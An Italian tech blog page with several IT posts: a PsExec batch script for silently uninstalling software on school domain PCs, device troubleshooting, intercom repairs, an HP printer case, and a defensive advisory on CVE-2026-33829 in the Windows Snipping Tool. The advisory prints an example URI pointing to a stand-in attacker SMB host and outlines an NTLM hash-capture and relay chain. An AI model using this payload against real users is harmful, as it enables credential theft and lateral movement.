Rimuovere Software da Client DC

Come ben sapete ho la gestione di più computer all'interno della mia rete e molti di questi sono utilizzati per tutto il tempo della mia presenza a scuola... Come fare manutenzione ad esempio rimuovendo Software non necessari senza disturbare ragazzi e docenti? Ho creato un piccolo programma DOS molto pratico che fa uso di PSEXEC. Si esegue dalla cartella del server dove presente psexec.exe e con diritti amministrativi di dominio!

Chiede il nome del PC che deve essere inserito correttamente nel dominio, una parte del nome del Software da rimuovere 

Ecco il contenuto da copiare ed incollare in un file RimuoviSoftware.bat

@echo off

color 17

setlocal enabledelayedexpansion

title Tool di Rimozione Remota con PsExec

:INIZIO

cls

echo ============================================================

echo         TOOL DI RIMOZIONE SOFTWARE REMOTA (PsExec)

echo ============================================================

echo.

:: 1. Richiesta input all'utente

set /p TARGET_PC="1. Inserisci il nome del PC remoto (es. mltm03): "

if "%TARGET_PC%"=="" goto INIZIO

set /p SOFTWARE_SEARCH="2. Inserisci parte del nome del software da cercare (es. Adobe): "

if "%SOFTWARE_SEARCH%"=="" goto INIZIO

echo.

echo Connessione a \\%TARGET_PC% e ricerca in corso...

echo Attendi qualche istante...

echo.

:: 2. Esegue WMIC tramite PsExec e salva il risultato in un file temporaneo locale

psexec \\%TARGET_PC% wmic product where "name like '%%%SOFTWARE_SEARCH%%%'" get identifyingnumber,name > temp_risultato.txt 2>nul

:: 3. Elabora il risultato

set /a conteggio=0

set "CODICI="

:: Salta le prime 2 righe dell'header WMIC

for /f "skip=2 tokens=1,*" %%a in (temp_risultato.txt) do (

    set "PROD_CODE=%%a"

    set "PROD_NAME=%%b"

    

    :: Salta righe vuote o solo spazi

    if not "!PROD_CODE!"=="" (

        set /a conteggio+=1

        echo [!conteggio!] Trovato: !PROD_NAME!

        echo    Codice: !PROD_CODE!

        echo ------------------------------------------------------------

        

        :: Accumula i codici e nomi in array virtuali

        set "code[!conteggio!]=!PROD_CODE!"

        set "name[!conteggio!]=!PROD_NAME!"

    )

)

if %conteggio%==0 (

    echo [!] Nessun software trovato con "%SOFTWARE_SEARCH%" su %TARGET_PC%.

    echo.

    pause

    goto PULIZIA

)

:: 4. Se più di un software, chiede quale disinstallare

if %conteggio% gtr 1 (

    echo.

    echo Trovati %conteggio% software corrispondenti alla ricerca.

    echo.

    set /p SCELTA="Inserisci il numero del software da disinstallare (1-%conteggio%): "

    

    :: Validazione input

    set "valido=0"

    for /l %%i in (1,1,%conteggio%) do (

        if "!SCELTA!"=="%%i" set "valido=1"

    )

    if "!valido!"=="0" (

        echo Scelta non valida.

        pause

        goto PULIZIA

    )

    

    set "PROD_CODE=!code[%SCELTA%]!"

    set "PROD_NAME=!name[%SCELTA%]!"

) else (

    :: Solo un software trovato

    set "PROD_CODE=!code[1]!"

    set "PROD_NAME=!name[1]!"

)

echo.

echo [INFO] Selezionato per la disinstallazione:

echo Nome    : !PROD_NAME!

echo Codice  : !PROD_CODE!

echo.

:: 5. Richiesta di conferma rimozione

choice /M "Vuoi procedere alla rimozione di questo specifico software?"

if errorlevel 2 goto ANNULLATO

if errorlevel 1 goto DISINSTALLA

:DISINSTALLA

echo.

echo [!] Disinstallazione in corso su \\%TARGET_PC%...

echo.

:: Opzionale: kill processi Adobe SOLO SE il software contiene "Adobe" nel nome

echo !PROD_NAME! | findstr /i "Adobe" >nul

if not errorlevel 1 (

    echo [!] Rilevato software Adobe, chiusura processi correlati...

    psexec \\%TARGET_PC% taskkill /f /im acrobat.exe /im acrotray.exe /im AdobeARM.exe 2>nul

    echo.

)

:: Esegue la disinstallazione silenziosa del software specifico

echo [!] Esecuzione disinstallazione per: !PROD_NAME!

psexec \\%TARGET_PC% msiexec /x !PROD_CODE! /qn /norestart

:: Controllo se il comando msiexec ha avuto successo

if errorlevel 0 (

    echo.

    echo [OK] Disinstallazione avviata con successo!

) else (

    echo.

    echo [ATTENZIONE] La disinstallazione potrebbe aver fallito. Controllare manualmente.

)

echo.

echo [!] Pulizia database Windows Installer...

psexec \\%TARGET_PC% net stop msiserver 2>nul

psexec \\%TARGET_PC% net start msiserver 2>nul

echo.

echo [OK] Operazione completata!

pause

goto PULIZIA

:ANNULLATO

echo.

echo [X] Operazione annullata dall'utente.

pause

goto PULIZIA

:PULIZIA

:: Rimuove i file temporanei

if exist temp_risultato.txt del temp_risultato.txt

cls

choice /M "Vuoi analizzare un altro PC?"

if errorlevel 2 exit /b

if errorlevel 1 goto INIZIO

La schermata principale

RAI Play su Fire TV Stick 4K: Analisi delle Criticità e Possibili Soluzioni

L'esperienza utente dell'applicazione RAI Play su dispositivi Amazon Fire TV Stick 4K è purtroppo costellata di instabilità croniche che ne compromettono la fruibilità. Un'analisi approfondita delle segnalazioni degli utenti, come quelle evidenziate nei forum di supporto Amazon, rivela tre problematiche principali che trasformano la visione di contenuti in un esercizio di pazienza: la gestione fallimentare delle sessioni di login, latenze di riproduzione insostenibili e un'interfaccia bloccata in stati di caricamento infinito.

1. Il Ciclo Infinito del Login

Uno dei difetti più frustranti è la perdita ricorrente delle credenziali di accesso. Gli utenti riferiscono di dover effettuare il login ripetutamente, anche a distanza di poche ore o dopo il semplice riavvio del dispositivo. Questo comportamento suggerisce un malfunzionamento nella gestione dei token di sessione o nella persistenza dei dati di autenticazione da parte dell'app sul sistema operativo Fire OS. Il risultato è una barriera all'ingresso che disincentiva l'uso spontaneo del servizio: l'utente non può semplicemente "accendere e guardare", ma deve prevenire ogni sessione con una procedura di autenticazione manuale.

2. Latenza e Buffering: La "Rotellina" della Discordanza

Anche superata la barriera del login, la riproduzione del flusso video è spesso affetta da ritardi significativi. Il sintomo più visibile è la classica "rotellina di caricamento" che appare immediatamente dopo la pressione del tasto play, rimanendo attiva per tempi indeterminati o bloccando completamente l'avvio del contenuto. Questo fenomeno indica problemi di ottimizzazione nel buffer iniziale o incompatibilità tra i codec video utilizzati dal broadcaster e la decodifica hardware della Fire TV Stick 4K. In molti casi, l'interfaccia risponde ai comandi (la rotellina gira), ma il flusso dati non viene stabilito correttamente, costringendo l'utente a forzare la riproduzione più volte o a riavviare l'applicazione.

La chiavetta acquistata da me

KB5089573 - Aggiornamento Windows 11

⚡ Prestazioni e reattività (Low Latency Profile)

Il cuore di questo aggiornamento è l'introduzione del "Low Latency Profile" (Profilo a bassa latenza), una tecnologia che modifica il comportamento del processore per rendere il sistema più scattante .

• Come funziona: Invece di aumentare gradualmente la frequenza della CPU sotto carico, Windows la porta immediatamente al massimo per brevi periodi (1-3 secondi) durante operazioni rapide come l'apertura di un menu o di un'app. Questo permette di completare il lavoro più velocemente, migliorando la sensazione di fluidità .

• Vantaggi percepiti:

• Avvio delle applicazioni fino al 40% più veloce.

• Apertura di menu e flyout (Start, Ricerca, Centro notifiche) fino al 70% più rapida.

• Esplora file, gesture touch e cambio tema più fluidi e affidabili.

• Nonostante l'aumento temporaneo della frequenza, completando le operazioni prima, il processore torna in idle più a lungo, portando a un consumo energetico spesso inferiore o invariato.

Cosa offre Metrolist

Metrolist 

si presenta come un client alternativo a YouTube Music, progettato per offrire un'esperienza senza interruzioni pubblicitarie e con diverse funzionalità extra, il tutto senza richiedere un abbonamento Premium.

Ecco un riepilogo delle sue funzioni:

Categoria	Funzionalità
Riproduzione	Streaming di qualsiasi brano o video, riproduzione in background e una modalità offline (cache/download).
Audio	Normalizzazione del volume, controllo di tempo/tonalità (pitch) ed equalizzatore integrato.
Testi e Scoperta	Testi sincronizzati (inclusa la modalità karaoke) e suggerimenti musicali personalizzati.
Libreria e Account	Gestione completa della tua libreria, playlist locali e la possibilità di accedere con il tuo account Google per sincronizzare i tuoi dati di YouTube Music.
Interfaccia e Altro	Design Material 3, diverse modalità di tema (scuro, dinamico), un timer per l'arresto e widget per la schermata home.
Social	Una funzione "listen together" per ascoltare musica in tempo reale con gli amici.

🤔 Aspetti da considerare

Anche se è un'ottima app, ci sono un paio di punti da tenere a mente:

• Disponibilità regionale: Metrolist si appoggia ai server di YouTube Music. Se il servizio non è disponibile nel tuo paese, l'app non funzionerà a meno che tu non utilizzi una VPN o un proxy per connetterti a una regione supportata.

• Installazione esterna: Trattandosi di un client non ufficiale, non troverai Metrolist sul Google Play Store. Dovrai scaricare e installare manualmente il file APK dal suo repository ufficiale su GitHub (o da store alternativi come IzzyOnDroid).

• Possibili bug: Come molti progetti open source in sviluppo attivo, potresti incontrare qualche piccolo bug occasionale. Consultare la sezione "Issues" su GitHub è un buon modo per vedere se un problema che riscontri è già noto.

• Derivati e fork: Data la sua natura open source, esistono anche altre app derivate da Metrolist con funzionalità aggiuntive, come ArchiveTune, che potresti valutare se desideri qualcosa di ancora più specifico.

Un piccolo aiutino

Mantenere il blog è un impegno continuo alla ricerca di notizie e di soluzioni. 

Se state pensando al risparmio vi aiuto con un conto corrente a spesa zero e ad una assicurazione che, pur essendo economica, vi copre come qualsiasi altra sul mercato.

Apri il Conto e Carta BBVA a 0€ per sempre e ottieni 10€ con il primo acquisto. Inoltre ricevi il 3% di remunerazione sul saldo del conto e il 3% di cashback sugli acquisti, per 6 mesi e senza fare niente. Accedi a https://www.bbva.it/promo/passaparola.html o scarica l'App BBVA e inserisci questo codice: 77610072423355

Prima Assicurazioni https://sconto.prima.it/amico/355845591/mgm?utm_source_platform=app

Spero di aver fatto cosa gradita. Se usate i codici con i miei link riceverò un riscontro e anche voi un piccolo sconto. Grazie

Sempre su Porter e Citofonia

Vorrei riportare alla vostra attenzione questo vecchio articolo, molto utile!

In questi giorni ho ricevuto delle mail da un collega molto disponibile che si è dedicato a comprendere, capire e riproporre un apparato alternativo in sostituzione alle vecchie cornette con microfono a carbone. Ripropongo qui, così come da lui inviato tutto il materiale che potrebbe essere utile a molti!

Buonasera Marco,

mi chiamo Luciano -OMISSIS- ( alias sempre ) , lo scorso Giugno ti avevo segnalato un piccolo errore nello schema del Porter 2659.

Rinnovo i complimenti per il tuo utilissimo blog ma nel contempo mi permetto di chiederti quanto segue :

Incuriosito dal tuo incipit : "Ho provato a simulare il circuito con un bellissimo software fornito gratuitamente dalla Linear Tecnology" ho scaricato il simulatore LTspice per provare a simulare e quindi capire un curioso circuitino che ho trovato nella cornetta citofonica di uno dei tanti compatibili/universali che si trovano sotto i 20€ in rete.

Ti chiederai perchè mi sono messo a smontare la nuova cornetta citofonica universale.

Faccio un passo indietro, abito in un condominio di 16 appartamenti con due posti esterni (cancello e portoncino) dove è presente il sistema TERSYSTEM (N.2 Porter 2659 / N.1 commutatore citofonico 608n / N.1 alimentatore 672)

Tempo fa avevamo dei problemi intermittenti su tale sistema con disagio da parte degli utenti. L'Amministratore ha proposto la sostituzione con un impianto con video citofono. L'assemblea ha bocciato l'ipotesi e cosi' mi sono messo a cercare di capire il perchè di tale malfunzionamento.

Nel locale contatori ho recuperato alcuni pezzi del sistema TERSYSTEM lasciati li negli anni dagli elettricisti che si sono succeduti nelle varie riparazioni.

Fortunatamente sono riuscito a ripararli e in mancanza di un secondo Porter 2659 ho deciso di autocostruirmelo con la tecnica vintage del WireWrap (lo vedi nella foto allegata)

Ho collegato il tutto e cosi' mi sono messo a studiarne le caratteristiche al fine di poter intervenire a fronte di futuri guasti ed evitare la sostituzione dell'impianto.

L'analisi del sistema mi è stato chiaro quasi nella sua totalità ad eccezione del circuito denominato ATTESA 

Tale circuito (laddove presente) attiva il pannellino luminoso con la scritta ATTESA sul lato esterno dove NON è stata effettuata la chiamata.

Ebbene tale avviso si attiva a volte si a volte no senza una precisa ragione, indagando sul circuito del 608n ho visto che tale avviso (circa 60 secondi) si attiva a fronte dell'alzata della cornetta chiamata.

L'instabiltà dell'avviso ATTESA,  dopo ore di prove si è chiarito, la causa è la capsula microfonica della cornetta 600 TERRANEO.

Tale capsula microfonica è del tipo a carbone ed a causa della vetustà della cornetta 600 TERRANEO le specifiche elettriche si sono alterate al punto di creare l'instabilità di cui sopra.

Ho cercato in rete tale capsule per provvedere alla sostituzione ma con grande sorpresa non ho trovato nulla di nuovo e di non ricondizionato 

A questo punto ho deciso di acquistare la cornetta universale che ho citato all'inizio ed ovviamente l'avviso di attesa ha funzionato in modo stabile.

Per carattere sono curioso ed ho voluto verificare quale modello di capsula a carbone fosse montata per magari vedere il modello e cercarlo in rete.

Ed invece GRANDE SORPRESA !!!

BASTA con Acrobat Reader...

Se lavorate nel settore IT o siete semplicemente utenti attenti alle risorse del vostro sistema, avrete notato come Adobe Acrobat Reader sia diventato un problema. Quello che un tempo era un visualizzatore di PDF snello si è trasformato in un vero e proprio bloatware da circa 1,5 GB di spazio occupato su disco, appesantito da processi in background invasivi, estensioni forzate per i browser e la continua richiesta di registrazione al cloud anche solo per compilare un modulo o apporre una sigla.

È il momento di dire basta e riprendersi il controllo del sistema. In questo articolo vedremo come sbarazzarsi definitivamente della suite Adobe e migrare a una soluzione totalmente open source, leggera e sicura su Windows: Okular. Vedremo inoltre come configurare i timbri grafici e come generare in locale un certificato di firma valido e verificato senza complicazioni (NON è una firma certificata FEA)!

Fase 1: Rimozione di Adobe Acrobat e pulizia profonda

La disinstallazione standard da pannello di controllo spesso lascia dietro di sé residui nel registro e cartelle orfane in AppData. Per una rimozione pulita su Windows:

1. Disinstallate l'applicazione tramite Impostazioni > App > App installate.
2. Per eliminare ogni traccia residua (servizi di update, task pianificati e chiavi di registro orfane), scaricate ed eseguite il tool ufficiale Adobe Acrobat Cleaner Tool dal sito di supporto Adobe.

Fase 2: Installazione di Okular e configurazione Timbri

Sviluppato dalla community KDE, Okular è un visualizzatore universale di documenti open source, privo di telemetria invasiva e leggerissimo.

Meglio scaricare la versione completa dal sito in formato exe. La versione APP con winget o da Store scarica una versione boxata che NON contiene la gestione firma digitale!

Configurare i Timbri per firme rapide (Non Ufficiali)

Okular permette di gestire la sovrapposizione di immagini (come la scansione della propria firma autografa con sfondo trasparente PNG) tramite lo strumento Timbro, ideale per la modulistica quotidiana:

• Aprite un PDF qualsiasi con Okular e premete F6 per attivare gli strumenti di recensione.
• Fate clic destro sull'icona del Timbro nella barra degli strumenti e selezionate Configura annotazioni.
• Aggiungete un nuovo timbro inserendo un nome identificativo (es. "Mia Firma") e caricate il vostro file PNG come sorgente.

Fase 3: Generatore di Certificato di Firma (Gratuito e Locale)

Se oltre al timbro grafico vi serve una firma digitale crittografica con il "semaforo verde" di validità, c'è un trucco eccezionale. Okular su Windows non usa il magazzino certificati di Microsoft, ma legge direttamente quello di Firefox. Questo significa che basta inserire il certificato in Firefox per averlo pronto anche in Okular.

Utility di Generazione .P12 per Okular

Questo strumento genera un certificato di firma direttamente nella memoria del vostro browser (WebCrypto locale). Nessun dato viene inviato a server esterni.

Nome Firmatario (CN): Scegli una Password:

2. Importate in Firefox: Una volta scaricato il file FirmaOkular.p12 sul Desktop tramite il box qui sopra, aprite Firefox, andate in Impostazioni, cercate "Certificati" e cliccate su Mostra certificati...
3. Salvate nel magazzino: Nella scheda Certificati personali, cliccate su Importa..., selezionate il file e inserite la password scelta nel box.

Fatto! Chiudete e riaprite Okular, andate in Impostazioni > Configura Okular > Firme: troverete il vostro certificato già configurato nella lista, gratuito, generato localmente sul vostro PC e pronto per siglare digitalmente i vostri PDF.

Analisi Tecnica del Guasto: Perché la serratura è "fusa"?

La dinamica del guasto si articola in due fasi: il cortocircuito biologico e il sovraccarico termico.

1. Il comportamento delle formiche (Il "Cortocircuito")

Le formiche sono attratte dai campi elettromagnetici e dal calore generato dalle schede elettroniche (fenomeno noto come elettrotropismo). Quando si introducono nel posto esterno (presumibilmente un Linea 3000 Bticino a 2 fili):

• Si accumulano tra i contatti del relè che comanda l'apertura della serratura (morsetti S+ e S-).

• I loro corpi, contenenti umidità e acido formico (che è corrosivo e conduttivo), creano un ponte resistivo o un vero e proprio cortocircuito pulito tra i contatti.

• Questo "ponte" ha simulato una pressione continua del pulsante apricancello, mantenendo il comando di apertura costantemente attivo.

2. L'effetto sulla serratura (La fusione dei rocchetti)

Le bobine delle serrature elettriche standard (di solito alimentate a 12V AC o tramite la scarica capacitiva del bus Bticino) sono progettate per un servizio intermittente (impulsi di pochi secondi).

• Effetto Joule: Il passaggio continuo di corrente per ore (o giorni) ha generato un calore della bobina ben superiore ai limiti di tolleranza.

• Collasso strutturale: Il calore estremo ha fuso il supporto in plastica (il rocchetto) su cui è avvolto il filo di rame smaltato. La plastica deformata ha bloccato meccanicamente il pistone interno (lo scrocco), impedendogli di muoversi anche in assenza di tensione. In molti casi, l'isolamento del rame si brucia, mandando in corto la bobina stessa.

Quando la sicurezza di rete "brikka" la stampante: il caso HP M110we, reti ministeriali e il ricatto dell'Always-On

Analisi Tecnica del Problema

Prima di passare all'articolo, smarchiamo i punti chiave a livello tecnico:

1. La Topologia di Rete: L'infrastruttura descritta prevede un doppio salto (Double NAT potenziale). La "saponetta" ministeriale fornisce internet al PC tramite Tethering USB; il PC Windows 11 funge a sua volta da router tramite la funzione Hotspot Wi-Fi per la stampante.

2. Il Blocco di Rete: Le reti fornite da enti governativi (come il Ministero della Salute per i MMG) sono soggette a rigide policy di sicurezza per la protezione dei dati sensibili (GDPR/Dati sanitari). Utilizzano firewall di livello 7 e filtri DNS molto aggressivi. Il blocco del sito di OAuth di HP non è un bug, ma una feature di sicurezza della rete ministeriale che mette in blackhole o filtra traffico API/telemetrico non esplicitamente in whitelist.

3. Il Vincolo Architetturale di HP+: Le stampanti HP con il suffisso "e" (es. M110we) richiedono un check-in costante con i server api.hp.com o hpsmart.com per convalidare l'abbonamento Instant Ink e lo stato DRM delle cartucce. Senza la risoluzione di questo handshake OAuth, il firmware disabilita la coda di stampa locale. La periferica cessa di essere un dispositivo hardware indipendente e diventa un client dipendente da un servizio cloud.
   
   

   
   
   
   

Oggi vi racconto di un vero e proprio delirio informatico che mi ha tenuto occupato recentemente e che solleva questioni tecniche (ed etiche) molto interessanti sul modo in cui stiamo progettando l'hardware "smart".

L'intervento riguardava l'assistenza a un Medico di Medicina Generale (MMG) con un'esigenza di mobilità. Il setup sembrava lineare, ma si è trasformato in un incubo di troubleshooting.

La Topologia del Disastro

Il setup operativo del medico era il seguente:

• Una connessione internet mobile fornita tramite "saponetta" istituzionale del Ministero della Salute.

• Il router mobile connesso al PC Windows 11 in Tethering USB.

• Una stampante HP M110we connessa al PC tramite l'Hotspot Wi-Fi nativo di Windows.

Il sintomo? La stampante ha improvvisamente smesso di comunicare con i server HP e, di conseguenza, si è rifiutata categoricamente di stampare anche un solo foglio di testo in locale.

Il Troubleshooting e la Scoperta

Dopo i classici test di raggiungibilità locale, ho avviato un'epopea con l'assistenza HP (routata in India). Dopo vari tentativi di re-inizializzazione, l'intuizione: e se il problema non fosse il doppio NAT causato dal bridge tra tethering e hotspot, ma la rete stessa?

Ho disconnesso il PC dalla rete ministeriale e l'ho collegato a una connessione cellulare standard. Magia: il server HP è tornato immediatamente raggiungibile e la stampante si è sbloccata.

La diagnosi: Le reti del Ministero della Salute, giustamente blindate per proteggere i dati sanitari dei pazienti, applicano policy di web filtering (probabilmente tramite DNS sinkhole o proxy trasparenti) che finiscono per bloccare i domini di autenticazione (OAuth) e la telemetria di HP.

HP Instant Ink: Convenienza vs. Controllo

Per capire questo blocco, dobbiamo analizzare l'ecosistema in cui opera la M110we. Quella piccola "e" nel nome del modello indica l'appartenenza alla famiglia HP+, un ecosistema indissolubilmente legato al servizio Instant Ink.

• I Pro (La Convenienza): Instant Ink è un modello Print-as-a-Service. Non paghi la cartuccia, ma un piano di pagine mensili. La stampante monitora i livelli e ordina automaticamente l'inchiostro prima che finisca. Per chi stampa volumi costanti e non vuole il pensiero dei consumabili, è economicamente e logisticamente sensato.

• I Contro (Il Vincolo): Le cartucce fornite sono dotate di un DRM rigoroso. Se annulli l'abbonamento, la cartuccia si disattiva anche se ancora mezza piena.

L'assurdità dell'Always-On per l'Hardware Locale

Ed eccoci al nocciolo del problema tecnico. Che un servizio cloud richieda internet è lapalissiano. Che una stampante fisica, posta a mezzo metro da un PC, debba trasformarsi in un fermacarte in plastica se non riesce a fare "ping" a un server in California, è un difetto di progettazione grave.

Per proteggere il proprio modello di business (evitare che un utente usi cartucce Instant Ink staccando la stampante da internet), HP ha introdotto un Single Point of Failure devastante. Nel nostro caso, una rete aziendale/istituzionale con policy stringenti ha interpretato le continue chiamate API della stampante come traffico non essenziale o potenzialmente malevolo, bloccando l'endpoint di OAuth.

Il risultato? L'impossibilità di svolgere l'operazione base per cui l'hardware è stato acquistato: trasferire inchiostro dal PC alla carta tramite protocollo di rete locale.

Conclusioni

Cosa ci insegna questa storia?

1. Evitate l'hardware "Cloud-Bound" in ambienti di produzione critici. Se state configurando dispositivi in uffici pubblici, scuole, reti mediche o bancarie, evitate come la peste le stampanti "Always-On" (come la serie HP+). Le restrizioni dei firewall di livello aziendale o ministeriale finiranno inevitabilmente per bloccarne l'uso.

2. Il confine tra periferica e servizio è scomparso. Quando acquistate una stampante oggi, leggete bene le specifiche. Se c'è scritto "richiede connessione internet attiva", sappiate che non siete più proprietari dell'hardware, ma semplici usufruttuari di un servizio in abbonamento.

Avete mai avuto problemi simili con le reti aziendali o firewall che bloccano l'hardware di casa? Fatemelo sapere nei commenti.

Un comodo Simulatore di Fotovoltaico

Fornisco il link ad una pagina creata da me per verificare l'investimento fotovoltaico.

Nulla di troppo complesso, pochi dati e si sa in quanto si rientra del proprio investimento. Alcuni dati sono già predisposti come il costo al kWh impostato a 30€cent

https://sites.google.com/view/simfotovoltaico

Recupero e Modernizzazione: Sostituire il Monitor CRT di un Videocitofono Bticino Swing con un Display LCD

Articolo a cura di un simpatizzante del blog

Spesso ci troviamo a gestire vecchi impianti di videocitofonica che, pur funzionanti nella logica di base, soffrono di obsolescenza tecnologica nei componenti visuali. È il caso del classico modulo interno Bticino Swing, equipaggiato originariamente con un piccolo tubo catodico (CRT) o primi modelli LCD ormai fuori produzione.

Dopo oltre due anni di sperimentazioni, errori e ripensamenti, presentiamo oggi il risultato finale di un progetto di "retrofit": la sostituzione del monitor originale Hanse (4 pollici TTF LCD) con un moderno pannello LCD da 4,3 pollici, comunemente utilizzato come monitor per retromarcia automobilistica.
La Sfida Tecnica

L'obiettivo era chiaro: mantenere l'estetica originale della cornetta Bticino sostituendo però il cuore tecnologico guasto o obsoleto. Il primo tentativo ha purtroppo portato a un blocco del sistema a causa di un adattamento errato, costringendo a utilizzare il citofono in modalità audio-only per lungo tempo. La lezione appresa? La pazienza e la precisione nei collegamenti sono fondamentali.

La seconda prova, quella definitiva, ha visto l'impiego di un monitor LCD da 4,3" con alimentazione a 12V. (link non affiliato)




Il Processo di Adattamento

L'intervento ha richiesto una modifica meccanica ed elettronica accurata:Smontaggio e Preparazione: È stato necessario rimuovere il tubo catodico e la scheda di controllo originale dal telaio plastico del modulo Bticino. Successivamente, il display è stato estratto dal suo contenitore plastico commerciale.
Modifica del Telaio: Per alloggiare il nuovo pannello, il telaio plastico originale è stato limato con precisione per ricavare lo spazio necessario, posizionando il nuovo LCD esattamente dove si trovava il vecchio monitor.
Elettronica e Sicurezza: Il connettore originale a 4 poli non era compatibile con le nuove esigenze. La soluzione è stata recuperare una morsettiera da un vecchio ricevitore FAAC.Dettaglio cruciale: Poiché il nuovo display assorbe circa 180mA, è stato inserito in serie all'alimentazione un fusibile da 250mA per proteggere il circuito da eventuali cortocircuiti o picchi di tensione.
Calibrazione: La regolazione di luminosità e contrasto è stata effettuata a citofono aperto durante la fase di collaudo, agendo sulla piccola PCB con tre pulsanti presente sul retro del display, che è stata lasciata nascosta all'interno del guscio.




Il Risultato Finale

Il sistema è ora pienamente operativo. La nuova integrazione permette di visualizzare il video con un ingombro minimo e un consumo energetico contenuto.

Nota sulla qualità video: Durante i test è emerso che la qualità dell'immagine, seppur accettabile sul nuovo schermo, risulta limitata non dal display LCD (che ha una buona risoluzione), ma dal vetrino del modulo camera esterno (PE). Dopo anni di esposizione agli agenti atmosferici, la lente esterna si è opacizzata, riducendo la nitidezza in ingresso. Questo conferma che, in questi recuperi, la catena della qualità è forte quanto il suo anello più debole: in questo caso, la camera esterna andrebbe pulita o sostituita per sfruttare appieno il nuovo monitor.




Conclusioni

Questo progetto dimostra come, con un po' di manualità e componenti di recupero o economici (come i monitor per auto), sia possibile dare una seconda vita a dispositivi che sembravano destinati alla discarica elettronica. Il rispetto per l'hardware esistente e la capacità di adattarlo alle tecnologie moderne è la chiave per un'elettronica più sostenibile e duratura.

Grazie al nostro collaboratore anonimo per aver condiviso questa dettagliata documentazione tecnica.

CVE-2026-33829 - Lo Snipping Tool che regala il tuo hash NTLM

Il succo della faccenda: clicci su un link, si apre lo Strumento di cattura di Windows come se niente fosse, e nel frattempo il tuo hash NTLMv2 (derivato dalla tua password di dominio o account locale) vola silenzioso verso un server controllato dall'attaccante. Nessun warning, nessun popup sospetto, zero sintomi visibili.

---

La Radice Tecnica

Lo Snipping Tool registra nel sistema un URI handler personalizzato chiamato ms-screensketch: (e ms-screenclip:), usato per aprire direttamente l'app tramite link dal browser o da altre app. Questo URI accetta un parametro filePath per indicare il file da aprire/modificare.

Il problema è brutalmente semplice: non c'è alcuna validazione del parametro filePath. Un attaccante può passargli un UNC path invece di un percorso locale:

Esempio:

ms-screensketch:edit?filePath=\\\\attacker.evil.com\\share\\badge.png

Quando Windows vede un percorso UNC (\\server\share\file), fa automaticamente una connessione SMB verso quel server. E quando apre una connessione SMB autenticata, trasmette automaticamente la risposta Net-NTLMv2 - ovvero un hash crittografico derivato dalla tua password - al server remoto.

Ecco un esempio fatto semplicemente su una cartella mappata:

---

La Catena d'Attacco (Attack Chain)

1. Preparazione: L'attaccante mette in piedi un server SMB malevolo (es. con Responder) e crea un link ms-screensketch: con UNC path che punta a quel server

2. Delivery: La vittima riceve il link via phishing email, pagina web compromessa, o messaggio Teams/Slack — mascherato da qualcosa di plausibile (es. "ritaglia la tua foto per il badge aziendale")

3. Esecuzione: La vittima clicca e conferma l'apertura dello Strumento di cattura (unica interazione richiesta)

4. Esfiltrazione silenziosa: Lo Snipping Tool tenta di caricare il file remoto via SMB → Windows invia automaticamente l'hash Net-NTLMv2 all'attaccante

5. Post-exploitation: L'hash può essere:

   • Craccato offline con Hashcat/John the Ripper per recuperare la password in chiaro

   • Usato direttamente in un attacco NTLM Relay per autenticarsi ad altri servizi interni senza neanche craccare

---

Dati della Vulnerabilità

Campo	Dettaglio
CVE	CVE-2026-33829 nvd.nist
CVSS 3.1	4.3 (Medium) technochat
CWE	CWE-200 – Exposure of Sensitive Information
Componente	Windows Snipping Tool (ms-screensketch: URI)
Scoperta da	Marcos Díaz Castiñeiras – BlackArrow (Tarlogic) linkedin
Segnalata a Microsoft	23 marzo 2026 redhotcyber
Patch rilasciata	14 aprile 2026 (Patch Tuesday) technochat
PoC pubblico	Sì, GitHub BlackArrow github

---

Perché il CVSS 4.3 Sottostima il Rischio Reale

Il punteggio "Medium" può ingannare. In ambienti Active Directory aziendali questo è un cazzo di problema serio per due motivi: [cybersecuritynews]

• NTLM Relay: In reti dove NTLM non è bloccato/disabilitato e SMB signing non è enforced, l'hash può essere riutilizzato in tempo reale per autenticarsi a file server, SharePoint, Exchange  senza craccare nulla

• Surface d'attacco enormissima: Lo Snipping Tool è preinstallato su ogni build di Windows, quindi potenzialmente colpisce ogni macchina Windows aziendale non aggiornata

Il MITRE ATT&CK mapping rilevante è T1550.002 – Pass the Hash per il movimento laterale.

---

Come Proteggersi

Fix immediato (obbligatorio):

• Installare gli aggiornamenti di sicurezza di aprile 2026 su tutte le macchine Windows [redhotcyber]

Misure di hardening aggiuntive:

• Bloccare il traffico SMB in uscita (porta 445) al perimetro della rete non dovrebbe mai uscire dall'infrastruttura interna [redhotcyber]

• Monitorare connessioni SMB anomale in uscita con SIEM/EDR; BlackArrow ha già pubblicato query KQL specifiche per Microsoft Defender XDRx

• Considerare la disabilitazione di NTLM dove possibile in favore di Kerberos (GPO: Network security: Restrict NTLM)

• Abilitare SMB Signing obbligatorio su tutti i server per mitigare i relay attack

Per i Blue Team, SOC Prime ha già regole di detection dedicate per questo CVE.

---

Contesto Storico: Non è la Prima Volta

Questo attacco si inserisce in un pattern più ampio di URI handler abuse su Windows. Già nel 2025 era stata documentata una tecnica analoga con lo schema ms-photos:, e ad aprile 2026 era emerso un bug simile in Explorer (CVE-2026-32202) dove una patch Microsoft aveva essa stessa introdotto un leak di credenziali. Il problema sistemico è che Windows espone decine di URI handler registrati dalle sue app native, e la validazione dell'input in questi handler è storicamente lacunosa.

---

Verifica protezione

Se hai da WINVER una versione superiore a quella indicata in tabella ... Sei OK!

Versione Windows	Build minima protetta	Come verificare
Win 11 25H2	26200.8246	winver oppure PowerShell
Win 11 24H2	26100.8246	winver oppure PowerShell
Win 11 23H2	22631.6936	winver oppure PowerShell
Win 10 22H2	19045.5858	winver oppure PowerShell

Analisi Tecnica e Geopolitica della Distribuzione Silenziosa di Modelli IA in Google Chrome

Impatto Infrastrutturale, Implicazioni Legali e Strategie di Mitigazione

L'evoluzione del browser web da semplice interprete di protocolli ipertestuali a ecosistema computazionale onnicomprensivo ha raggiunto una nuova soglia critica con l'integrazione nativa di modelli linguistici di grandi dimensioni (LLM) direttamente nell'hardware dell'utente finale. Negli ultimi mesi, un numero crescente di analisi tecniche e segnalazioni da parte di esperti di sicurezza ha evidenziato come Google Chrome abbia iniziato a distribuire in modo silente un file binario di circa 4 gigabyte, denominato weights.bin, all'interno delle directory di sistema dei dispositivi host. Questo file costituisce il nucleo dei parametri addestrati per Gemini Nano, la versione ottimizzata per l'esecuzione locale della famiglia di modelli generativi di Google. La distribuzione di un asset di tali dimensioni, effettuata senza una richiesta esplicita di consenso o una notifica trasparente dell'impatto sullo storage, solleva interrogativi fondamentali sulla sovranità digitale dell'utente e sulla gestione etica delle risorse hardware di terze parti da parte dei grandi fornitori di software.

